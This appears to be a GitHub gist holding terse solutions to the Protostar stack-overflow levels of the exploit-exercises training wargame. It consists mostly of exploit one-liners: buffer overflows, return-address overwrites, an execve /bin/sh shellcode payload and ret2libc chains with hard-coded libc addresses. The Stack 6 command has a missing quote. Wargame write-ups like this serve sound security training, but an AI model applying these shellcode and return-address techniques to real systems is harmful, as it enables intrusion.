Skip to content

Instantly share code, notes, and snippets.

@Grazfather

Grazfather/gist:40d40e60bfa06e1c15fd

Created May 23, 2015 20:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Grazfather/40d40e60bfa06e1c15fd to your computer and use it in GitHub Desktop.
Save Grazfather/40d40e60bfa06e1c15fd to your computer and use it in GitHub Desktop.
Download ZIP
exploit-exercises protostar
Raw
gistfile1.md

Stack solutions

Stack 0

python -c "print 'A'*70" | ./stack0

Stack 1

./stack1 `python -c "print 'dcba'*17"`

Stack 2

GREENIE="`python -c \"print '\x0a\x0d\x0a\x0d'*17\"`" ./stack2

Stack 3

readelf -s ./stack3 | grep win
python -c "print 'AAAA'*16+'\x24\x84\x04\x08'" | ./stack3

Stack 4

readelf -s ./stack4 | grep win
python -c "print 'AAAA'*19+'\xf4\x83\x04\x08'" | ./stack4

Stack 5

import struct

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
buffer = 0xbffff810
delta = 0x4c # Distance to RA on stack
ra = buffer + delta

input = '\x90' * delta
input += struct.pack('<I', ra + 4)
input += shellcode

print input

Stack 6

  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf
cat <(python -c "print 'a'*80 + \xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'") - | ./stack6

Stack 7

Just ret to another ret!

  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf
  • address of 'ret' instruction: 0x08048553
cat <(python -c "print 'a'*80 + '\x53\x85\x04\x08' + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'") -| ./stack7
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment